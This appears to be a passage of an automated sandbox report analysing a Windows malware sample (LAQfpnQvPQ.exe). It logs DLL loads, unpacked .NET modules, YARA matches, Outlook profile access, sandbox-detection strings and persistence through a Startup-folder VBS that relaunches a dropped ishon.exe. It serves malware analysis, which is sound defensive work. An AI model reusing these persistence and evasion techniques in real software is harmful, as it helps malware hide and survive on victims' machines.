                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeProcess created: C:\Users\user\Desktop\LAQfpnQvPQ.exe "C:\Users\user\Desktop\LAQfpnQvPQ.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess created: C:\Users\user\AppData\Roaming\ishon.exe "C:\Users\user\AppData\Roaming\ishon.exe"
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Section loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: LAQfpnQvPQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: LAQfpnQvPQ.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: LAQfpnQvPQ.exe, 00000000.00000002.2241775942.0000000006A10000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: LAQfpnQvPQ.exe, 00000000.00000002.2241775942.0000000006A10000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                      Source: 0.2.LAQfpnQvPQ.exe.6a10000.4.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                      Source: 0.2.LAQfpnQvPQ.exe.7700000.7.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                      Source: 0.2.LAQfpnQvPQ.exe.7700000.7.raw.unpack, ListDecorator.cs .Net Code: Read
                      Source: 0.2.LAQfpnQvPQ.exe.7700000.7.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                      Source: 0.2.LAQfpnQvPQ.exe.7700000.7.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                      Source: 0.2.LAQfpnQvPQ.exe.7700000.7.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                      Source: 0.2.LAQfpnQvPQ.exe.43c5c20.3.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                      Source: 0.2.LAQfpnQvPQ.exe.43c5c20.3.raw.unpack, ListDecorator.cs .Net Code: Read
                      Source: 0.2.LAQfpnQvPQ.exe.43c5c20.3.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                      Source: 0.2.LAQfpnQvPQ.exe.43c5c20.3.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                      Source: 0.2.LAQfpnQvPQ.exe.43c5c20.3.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                      Source: Yara match File source: 5.2.ishon.exe.43511c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.LAQfpnQvPQ.exe.76a0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.LAQfpnQvPQ.exe.42f11c0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000005.00000002.2515782521.0000000004351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.2244743417.00000000076A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.2219471547.000000000320E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_017EDA98 pushad ; ret 0_2_017EDA99
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_069F7658 pushfd ; ret 0_2_069F7659
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_069F3E66 push BA056CC2h; retf 0_2_069F3E6B
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_069FB74D push es; iretd 0_2_069FB75C
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_069F8510 pushfd ; retf 0_2_069F8519
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_069F823E push es; iretd 0_2_069F8240
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_069FCBD6 push es; iretd 0_2_069FCBDC
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_075F455B push eax; ret 0_2_075F4949
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_075F4560 push eax; ret 0_2_075F4949
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_075F3C11 push esp; retf 0_2_075F3C8D
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_075F3C30 push esp; retf 0_2_075F3C8D
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_0762F078 push 0C077DCBh; retf 0_2_0762F07D
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_077557A5 push FFFFFF8Bh; iretd 0_2_077557A7
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 0_2_0775578B push FFFFFF8Bh; ret 0_2_07755790
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 3_2_02D29720 push esp; ret 3_2_02D29721
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Code function: 3_2_05AE3181 push ebx; retf 3_2_05AE3182
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_0134DA98 pushad ; ret 5_2_0134DA99
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_07481913 push eax; ret 5_2_0748191D
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_07483D33 pushfd ; retf 5_2_07483D4D
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_07483D9D push C006C4F1h; retf 5_2_07483DAD
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_07483C73 push esp; retf 5_2_07483C8D
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_074CF068 push 0C0767CBh; retf 5_2_074CF06D
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_075F578D push FFFFFF8Bh; ret 5_2_075F5790
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_075F57A4 push FFFFFF8Bh; iretd 5_2_075F57A7
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_075F2203 push cs; iretd 5_2_075F2204
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_076287A0 pushfd ; retf 5_2_076287A9
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_07623CF6 push BA0556C2h; retf 5_2_07623CFB
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_076278E8 pushfd ; ret 5_2_076278E9
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Code function: 5_2_0769C76A push ss; ret 5_2_0769C771
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe File created: C:\Users\user\AppData\Roaming\ishon.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara match; File source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTR
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.000000000320E000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.000000000326E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Memory allocated: 17E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Memory allocated: 3160000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Memory allocated: 5160000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Memory allocated: 2CE0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Memory allocated: 2F30000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Memory allocated: 2E40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Memory allocated: 1340000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Memory allocated: 31C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Memory allocated: 3000000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Memory allocated: 1550000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Memory allocated: 2F90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Memory allocated: 2DA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Window / User API: threadDelayed 2068
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Window / User API: threadDelayed 6082
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Window / User API: threadDelayed 2211
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exe; Window / User API: threadDelayed 7621
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Window / User API: threadDelayed 3282
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Window / User API: threadDelayed 3123
